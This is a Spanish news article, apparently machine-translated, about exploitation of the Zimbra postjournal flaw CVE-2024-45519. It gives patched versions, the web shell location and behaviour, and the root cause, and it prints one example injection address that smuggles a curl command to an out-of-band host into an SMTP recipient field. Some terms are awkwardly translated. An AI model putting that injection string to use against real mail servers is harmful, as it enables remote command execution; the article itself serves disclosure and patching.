Los investigadores de ciberseguridad advierten sobre intentos activos de explotación dirigidos a una falla de seguridad recientemente revelada en la colaboración Zimbra de Synacor.
La empresa de seguridad empresarial Proofpoint dijo que comenzó a observar la actividad a partir del 28 de septiembre de 2024. Los ataques buscan explotar CVE-2024-45519Una grave falla de seguridad en el servicio de publicación de Zimbra que podría permitir a atacantes no autenticados ejecutar comandos arbitrarios en las instalaciones afectadas.
“Los correos electrónicos que falsificaban Gmail se enviaron a direcciones falsas en campos CC con la intención de que los servidores Zimbra los analizaran y ejecutaran como comandos”, Proofpoint dicho en una serie de artículos sobre X. “Las direcciones contenían cadenas Base64 ejecutadas con la utilidad sh”.
El problema crítico fue abordado por Zimbra en versiones 8.8.15 Parche 46, 9.0.0 Parche 41, 10.0.9 y 10.1.1 publicado el 4 de septiembre de 2024. A un investigador de seguridad llamado lebr0nli (Alan Li) se le atribuyó el descubrimiento y el informe de la falla.
“Aunque la función postlog puede ser opcional o no estar habilitada en la mayoría de los sistemas, aún es necesario aplicar el parche proporcionado para evitar una posible explotación”, Ashish Kataria, ingeniero arquitecto de seguridad de Synacor, nota en un comentario del 19 de septiembre de 2024.
“Para los sistemas Zimbra donde la funcionalidad postdiario no está habilitada y el parche no se puede aplicar inmediatamente, eliminar el binario postdiario podría considerarse una medida temporal hasta que se pueda aplicar el parche”.
Proofpoint dijo que ha identificado una serie de direcciones de copia que, cuando se decodifican, intentan escribir un shell web en un servidor Zimbra vulnerable en la ubicación: “/jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp”.
Luego, el shell web instalado escucha las conexiones entrantes con un campo de cookie JSESSIONID predeterminado y, si está presente, analiza la cookie JACTION para los comandos Base64.
El web shell está equipado con soporte para ejecutar comandos a través de exec. Alternativamente, también puede descargar y ejecutar un archivo a través de una conexión de socket. Los ataques no han sido atribuidos a ningún actor o grupo de amenaza conocido al momento de escribir este artículo.
Dicho esto, la actividad de explotación parece haber comenzado un día después de que Project Discovery publicara detalles técnicos de la falla, que dicho esto “proviene de entradas no saneadas del usuario pasadas a abierto en la versión sin parches, lo que permite a los atacantes inyectar comandos arbitrarios.
La compañía de ciberseguridad dijo que el problema surge de la forma en que el binario postjournal basado en C maneja y analiza las direcciones de correo electrónico de los destinatarios en una función llamada “msg_handler()”, lo que permite inyectar comandos en el servicio ejecutado en el puerto 10027 al pasar un mensaje especialmente diseñado. SMTP. mensaje con una dirección falsa (por ejemplo, “aabbb$(curl${IFS}oast.me)”@mail.domain.com).
A la luz de los intentos de explotación activos, se recomienda encarecidamente a los usuarios que apliquen los parches más recientes para obtener una protección óptima contra posibles amenazas.